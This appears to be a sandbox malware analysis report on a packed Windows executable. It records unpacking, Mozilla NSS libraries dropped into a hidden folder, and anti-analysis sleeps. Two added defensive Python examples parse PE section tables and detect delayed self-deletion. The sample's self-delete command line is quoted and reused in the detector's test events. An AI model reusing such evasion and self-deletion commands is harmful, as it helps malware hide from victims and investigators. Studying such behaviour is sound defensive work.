Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: aC:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack .text:ER;.data:W;.web:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00466770 push eax; ret 1_2_0046678E
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004667E0 push eax; ret 1_2_004667C5
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0046678F push eax; ret 1_2_004667C5
PE file contains sections with non-standard names
Source: KqxsoH2Rhn.exe Static PE information: section name: .web
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /31
Source: sqlite3.dll.1.dr Static PE information: section name: /45
Source: sqlite3.dll.1.dr Static PE information: section name: /57
Source: sqlite3.dll.1.dr Static PE information: section name: /70
Source: sqlite3.dll.1.dr Static PE information: section name: /81
Source: sqlite3.dll.1.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr Static PE information: section name: .orpc
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 1_2_004333DD
Binary contains a suspicious time stamp
Source: ucrtbase.dll.1.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
(Caveat: ucrtbase.dll is a Microsoft runtime DLL built reproducibly, and on such binaries the PE TimeDateStamp field carries a build hash rather than a date, so a far-future timestamp on this dropped file is expected and is not by itself evidence of tampering; check its Authenticode signature instead.)
Source: initial sample Static PE information: section name: .text entropy: 7.74205706051
(The entropy line belongs with the unpacking findings above: a .text section at 7.74 of 8 bits is what packed or encrypted code looks like before the in-memory unpack recorded at 1.2.KqxsoH2Rhn.exe.400000.0.unpack.)
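The two unpacking signatures above rest on comparing the section table of the file on disk with the one recovered from the unpacked image, and the sqlite3.dll entries show GNU-ld style "/N" section names. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses a PE section table with the standard library only, renders each section's memory-protection bits in the E/R/W letters the report uses (the report abbreviates a writable data section to "W"; this prints the full "RW"), resolves "/N" names through the COFF string table, and diffs an on-disk map against a dumped one. The three images it works on are constructed in memory by build_pe (no optional header, so they parse but cannot load); pass open(path, "rb").read() of a real file to section_rights for the same output.

```python
"""Parse a PE section table, render section rights in the E/R/W notation used
above, resolve GNU-ld style '/N' long section names, and diff the on-disk
section map against a memory-dumped one. Added example, not report code."""
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def rights(characteristics: int) -> str:
    """E/R/W letters for the memory-protection bits, '-' if none are set."""
    bits = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, flag in bits if characteristics & flag) or "-"


def section_rights(pe: bytes, resolve_long_names: bool = True) -> dict:
    """Map section name -> rights string, in section-table order.

    Names of the form '/N' (GNU ld, seen on mingw-built DLLs such as sqlite3.dll)
    are decimal offsets into the COFF string table, which starts right after the
    symbol table (PointerToSymbolTable + NumberOfSymbols * 18).
    """
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    (_machine, nsections, _stamp, sym_ptr, nsyms,
     opt_size, _flags) = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size            # section table follows the optional header
    strtab = sym_ptr + nsyms * 18 if sym_ptr else 0
    result = {}
    for i in range(nsections):
        hdr = table + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        if resolve_long_names and name.startswith("/") and strtab:
            start = strtab + int(name[1:])
            name = pe[start:pe.index(b"\0", start)].decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", pe, hdr + 36)[0]
        result[name] = rights(characteristics)
    return result


def diff_sections(on_disk: bytes, dumped: bytes) -> dict:
    """What changed between the file's section map and the unpacked image's."""
    a, b = section_rights(on_disk), section_rights(dumped)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": {n: (a[n], b[n]) for n in a if n in b and a[n] != b[n]},
    }


def build_pe(sections) -> bytes:
    """Constructed minimal 32-bit PE for testing: DOS header, 'PE\\0\\0', a COFF
    header with no optional header, one 40-byte section header per entry and a
    COFF string table for names longer than 8 bytes. Parseable, not loadable."""
    strtab = bytearray(b"\0\0\0\0")     # 4-byte size field, patched below
    headers = bytearray()
    for name, characteristics in sections:
        raw = name.encode()
        if len(raw) > 8:                 # GNU ld convention: '/<offset into string table>'
            raw = b"/" + str(len(strtab)).encode()
            strtab += name.encode() + b"\0"
        headers += raw.ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", characteristics)
    struct.pack_into("<I", strtab, 0, len(strtab))
    coff_off = 0x40 + 4
    strtab_off = coff_off + 20 + len(headers)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, strtab_off, 0, 0, 0x0102)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + coff + bytes(headers) + bytes(strtab)


_R, _W, _E = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE
# Constructed stand-ins for the two section maps quoted in the report.
ON_DISK_SAMPLE = build_pe([
    (".text", _E | _R | IMAGE_SCN_CNT_CODE),
    (".rdata", _R | IMAGE_SCN_CNT_INITIALIZED_DATA),
    (".data", _R | _W | IMAGE_SCN_CNT_INITIALIZED_DATA),
    (".reloc", _R | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_CNT_INITIALIZED_DATA),
])
UNPACKED_SAMPLE = build_pe([
    (".text", _E | _R | IMAGE_SCN_CNT_CODE),
    (".data", _R | _W),
    (".web", _R | _W),              # the non-standard section flagged in the report
    (".rsrc", _R),
    (".reloc", _R),
])
# Constructed stand-in for a mingw-built DLL carrying GCC debug sections.
MINGW_SAMPLE = build_pe([
    (".text", _E | _R | IMAGE_SCN_CNT_CODE),
    (".debug_aranges", _R | IMAGE_SCN_MEM_DISCARDABLE),
    (".debug_info", _R | IMAGE_SCN_MEM_DISCARDABLE),
])

if __name__ == "__main__":
    print("on disk :", section_rights(ON_DISK_SAMPLE))
    print("unpacked:", section_rights(UNPACKED_SAMPLE))
    print("diff    :", diff_sections(ON_DISK_SAMPLE, UNPACKED_SAMPLE))
    print("raw     :", list(section_rights(MINGW_SAMPLE, resolve_long_names=False)))
    print("resolved:", list(section_rights(MINGW_SAMPLE)))
```

A "/N" name is therefore a toolchain artifact (long section names that do not fit the 8-byte field), not a sign of packing on its own; the finding that matters here is the disappearance of .rdata and the appearance of the writable .web section in the unpacked image.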

Persistence and Installation Behavior:

Drops PE files
(All 59 files are legitimate third-party libraries, namely Mozilla Thunderbird/NSS components (nss3, softokn3, freebl3, nssckbi, nssdbm3, mozglue, ldap60, prldap60, ldif60, mozMapi32, MapiProxy, breakpadinjector, the .orpc accessibility marshallers) plus the VC++ and UCRT runtime (msvcp140, vcruntime140, ucrtbase, api-ms-win-*), staged into a randomly named directory under %USERPROFILE%\AppData\LocalLow; the sample itself is the only malicious PE on this list.)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0041DD0B
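The self-deletion command above (cmd.exe /C timeout ... & Del /f /q "<own path>") is the kind of pattern the Sigma rule "Suspicious Del in CommandLine" listed in the overview is after. The detector below is an added example, not part of the report or of any Sigma rule set: it splits a cmd.exe /c chain on & and &&, recognises a stalling segment (timeout, ping -n or choice /t, a generalisation beyond the timeout seen here), extracts the del/erase target, and rates the hit "high" when the target equals the parent process's own image path and "medium" for a delayed delete of any other executable. The four process-creation records are constructed in Sysmon Event ID 1 field names; the first reproduces the command line quoted in this report, the others are invented controls.

```python
"""Flag cmd.exe command lines that delay and then delete an executable, and
escalate when the target is the parent process's own image (self-deletion).
Added example over constructed events; not part of the report."""
import re

# Segments of a cmd.exe /c chain that only stall: timeout, ping -n, choice /t
DELAY_RE = re.compile(r"^(timeout|ping|choice)\b", re.I)
# del/erase with optional switches and a quoted or bare path
DEL_RE = re.compile(r'^(?:del|erase)\s+(?P<switches>(?:/\w\s+)*)(?P<path>"[^"]+"|\S+)', re.I)


def cmd_chain(command_line: str) -> list:
    """Split 'cmd.exe /c a & b && c' into ['a', 'b', 'c']; [] if no /c or /k."""
    m = re.search(r"\s/[ck]\s+(.*)$", command_line, re.I)
    if not m:
        return []
    return [seg.strip() for seg in re.split(r"\s*&&?\s*", m.group(1)) if seg.strip()]


def analyze(event: dict):
    """Return a finding for one process-creation event, or None."""
    if not event["Image"].lower().endswith("\\cmd.exe"):
        return None
    chain = cmd_chain(event["CommandLine"])
    delayed = any(DELAY_RE.match(seg) for seg in chain)
    parent = event.get("ParentImage", "").lower()
    for seg in chain:
        m = DEL_RE.match(seg)
        if not m:
            continue
        target = m.group("path").strip('"')
        switches = {s.lower() for s in m.group("switches").split()}
        finding = {"pid": event["ProcessId"], "target": target, "delayed": delayed,
                   "force_quiet": {"/f", "/q"} <= switches}   # /f /q: no prompt, read-only too
        if target.lower() == parent:
            return {**finding, "severity": "high", "rule": "self-deletion via cmd"}
        if delayed and target.lower().endswith((".exe", ".dll", ".scr")):
            return {**finding, "severity": "medium", "rule": "delayed delete of executable"}
    return None


def scan(events) -> list:
    """Findings for a batch of events, in input order."""
    return [f for f in (analyze(e) for e in events) if f]


# Constructed process-creation records in Sysmon Event ID 1 field names.
# The first one reproduces the command line quoted in this report.
EVENTS = [
    {"ProcessId": 6120, "ParentImage": r"C:\Users\user\Desktop\KqxsoH2Rhn.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe"'},
    {"ProcessId": 6144, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\timeout.exe", "CommandLine": "timeout /T 10 /NOBREAK"},
    {"ProcessId": 7040, "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c ping 127.0.0.1 -n 6 > nul && del /f "C:\Users\user\AppData\Local\Temp\stage2.exe"'},
    {"ProcessId": 7100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c del /q "C:\Users\user\Documents\old notes.txt"'},
]

if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f["severity"], f["rule"], f["target"], "delayed" if f["delayed"] else "immediate")
```

The parent-image comparison is what separates self-deletion from the installers and updaters that legitimately delete a temporary executable after a delay; the delay itself matters because it is what lets the original process exit and release its file lock before the delete runs.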

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe TID: 7136 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7000 Thread sleep count: 84 > 30
(The timeout.exe entry is the 10-second delay of the self-deletion command in the previous section, not an evasion loop in the sample; only the first entry is the sample's own sleep.)
Found dropped PE file which has not been started or loaded
(Cross-check against the Drops PE files list: six of the 59 dropped files are absent here and so were loaded by the sample: nss3.dll, mozglue.dll, msvcp140.dll, vcruntime140.dll, ucrtbase.dll and sqlite3.dll, exactly the dependency chain needed to call into nss3.dll; softokn3.dll and freebl3.dll, which nss3.dll loads only once it opens a profile key database, stayed unloaded.)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll
